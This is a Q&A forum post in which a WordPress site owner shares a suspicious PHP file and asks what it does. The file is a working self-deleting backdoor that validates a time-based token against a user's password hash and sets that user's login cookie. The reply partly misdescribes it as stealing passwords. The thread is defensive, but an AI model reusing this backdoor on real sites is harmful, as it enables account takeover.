# Malicious Code in a File under my folder. Just wanna to know what he do

Tags: wordpress, wordpress-theming, custom-wordpress-pages

I have found a strange file in my client folder. i want to know what this code do. what the mean is

```
$file =( $p = strpos(__FILE__,"(") )=== false ? __FILE__ : 
substr(__FILE__,0,$p);if (!unlink($file)){  chmod($file,0777);   
unlink($file);}define("ABSPATH", dirname(dirname($file))."/");
include_once(ABSPATH."wp-config.php");
include_once(ABSPATH."wp-admin/includes/file.php");
include_once(ABSPATH."wp-admin/includes/plugin.php");
include_once(ABSPATH."wp-admin/includes/theme.php");
include_once(ABSPATH."wp-admin/includes/misc.php");
$k = substr($_SERVER["QUERY_STRING"],0,32);$u = 
 substr($_SERVER["QUERY_STRING"],32);
$h = $wpdb->get_var( $wpdb->prepare( 
 "SELECT user_pass FROM {$wpdb->users} WHERE ID = %s", $u ) );
if ( 
 is_string($h) &&( $k === md5(mktime(date("H"), date("i"), 0).md5($h))                    
 || $k === md5(mktime(date("H"), date("i")-1, 0).md5($h))                    
 || $k === md5(mktime(date("H"), date("i")+1, 0).md5($h)) )){    
wp_set_auth_cookie($u);}header("Location: 
 ".\'http://www.example.com/blog/wp-admin/\');', LOCK_EX);
```

Please help me regarding this code. is it hacking code or else?

Answer (score 0):

I guess you could call that hacking code.

It reads the sensitive parts of your site to get your salt and hashes, then grabs your passwords from the database. I would assume all of your credentials are compromised on that site.

Once you get the file removed and the site cleaned then you should rotate all credentials with any permissions and also a quick edit of your config.php file to [replace the salt keys](https://api.wordpress.org/secret-key/1.1/salt) with new ones generated from Wordpress' API.

Comment: ok thanks i had same idea too.do i need to change just login details of admin or more??

Comment: Well it is no use changing credentials until you find out where the file came from. Firstly you need to make sure the hacker can not upload to that folder and also review everyone who had access to that folder. Then you make sure the site is clean of any other files, and then you change the credentials.

Comment: i have updated the file permission and changed hash codes going to update username password lets see other things